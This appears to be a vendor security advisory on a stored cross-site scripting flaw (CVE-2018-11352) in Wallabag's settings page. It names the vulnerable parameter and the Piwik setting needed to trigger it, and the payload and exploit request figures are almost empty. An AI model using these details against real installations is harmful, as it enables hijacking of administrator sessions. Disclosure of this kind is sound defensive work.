Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›

Wallabag 2.2.3 to 2.3.2 - Stored Cross-Site Scripting

Gauge reading medium severity


The Wallabag application is affected by one cross-site scripting (XSS) vulnerability that is stored within the configuration page. This vulnerability enables the execution of a JavaScript payload each time an administrator visits the configuration page. The vulnerability can be exploited with authentication and used to target administrators and steal their sessions.

Product Description

Wallabag is an open source RSS reader application, distributed under an MIT license. The project official website is The vulnerability described in this document affects version 2.2.3 (released on May 18, 2017) through version 2.3.2 (released on January 22, 2018).

Vulnerabilities List

One vulnerability was identified within the Wallabag web application:
One instance of stored cross-site scripting

Affected Version

Version 2.2.3 to 2.3.2

Vulnerability Details

  • CVE ID: CVE-2018-11352
  • Access Vector: Remote
  • Security Risk: Medium
  • Vulnerability: CWE-79
  • CVSS Base Score: 4.9
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

The XSS vulnerability is located on the internal settings configuration page. By injecting a JavaScript payload in this page, an attacker can steal an administrator session. An admin account is required to exploit this instance. The vulnerable parameter is craue_config_modifySettings[settings][23][value]. To trigger the vulnerability, Piwik must be enabled, which can be done by setting the value 1 to the parameter craue_config_modifySettings[settings][22][value]. The following payload can be used to demonstrate the attack:


Figure 1 - XSS Payload

The request below can be used to exploit the vulnerability:

POST /settings HTTP/1.1
Host: HOST


 Figure 2 - XSS Exploitation Request

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

Florian nivette

About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.

More by Florian

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.